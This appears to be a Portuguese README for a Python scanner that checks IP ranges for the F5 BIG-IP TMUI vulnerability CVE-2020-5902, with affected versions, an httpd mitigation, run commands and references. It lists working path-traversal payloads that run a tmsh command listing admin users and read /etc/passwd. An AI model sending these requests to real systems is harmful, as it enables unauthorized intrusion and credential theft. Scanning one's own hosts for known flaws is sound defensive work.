Scan IP Checker CVE-2020-5902
A vulnerabilidade descoberta pode ser usada para criar ou excluir arquivos, executar comandos no sistema.
VERSÕES AFETADAS
- 15.0.0–15.1.0.3
- 14.1.0–14.1.2.5
- 13.1.0–13.1.3.3
- 12.1.0–12.1.5.1
- 11.6.1–11.6.5.1
CORREÇÃO TEMPORÁRIA ( httpd config )
include '
<LocationMatch ".*..;.*">
Redirect 404 /
</LocationMatch>
'
WARNING
+------------------------------------------------------------------------------+
| [!] Legal disclaimer: Usage of checker-CVE-2020-5902 for attacking |
| targets without prior mutual consent is illegal. |
| It is the end user's responsibility to obey all applicable |
| local, state and federal laws. |
| Developers assume no liability and are not responsible for any misuse or |
| damage caused by this program |
+------------------------------------------------------------------------------+
REQUEST ENVIADOS PELO SCRIPT:
- TARGET+/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
- TARGET+/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
- TARGET+/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp
- TARGET+/tmui/login.jsp/..;/tmui/util/getTabSet.jsp
- TARGET+/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
- TARGET+/tmui/login.jsp/..;/tmui/locallb
EXECUÇÃO
python3.8 checker.py ip_start ip_end
python3.8 checker.py 192.168.15.1 192.168.15.86
OUTPUT DE VALORES
output.log
error.log
DOWNLOAD TOOL
REF
- https://engineeringjobs4u.co.uk/helping-to-protect-against-the-f5-tmui-rce-vulnerability
- https://medium.com/certik/cve-2020-5902-analysis-f5-big-ip-rce-vulnerability-3a3ae6278128
- https://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5902
- https://blog.cloudflare.com/cve-2020-5902-helping-to-protect-against-the-f5-tmui-rce-vulnerability/